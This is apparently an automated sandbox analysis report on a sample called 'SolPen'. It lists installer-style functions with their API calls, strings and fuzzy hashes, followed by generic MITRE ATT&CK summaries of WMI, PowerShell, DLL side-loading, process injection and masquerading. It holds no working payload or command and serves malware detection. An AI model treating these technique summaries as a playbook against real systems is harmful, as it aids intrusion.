Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

@rD, xrefs: 00404934
, xrefs: 004048DA

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59

Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00406278
lstrcatW.KERNEL32(00000000,...), ref: 0040629B

Strings

%02x%c, xrefs: 00406270
..., xrefs: 00406293

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794

Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405057

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

OleUninitialize.OLE32(00000404,00000000), ref: 004050A5

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

Section: "%s", xrefs: 00405079
Skipping section: "%s", xrefs: 004050B5

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D

Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
lstrcpynW.KERNEL32(?,?,?), ref: 00407261

Strings

Version , xrefs: 00407241

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC

Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
GetProcAddress.KERNEL32(?,00000000), ref: 00406395
GlobalFree.KERNEL32(00000000), ref: 0040639E

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718

Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
CloseHandle.KERNEL32(?), ref: 00405C71

Strings

Error launching installer, xrefs: 00405C48

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68

Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062A5, 004062AA

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E

Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

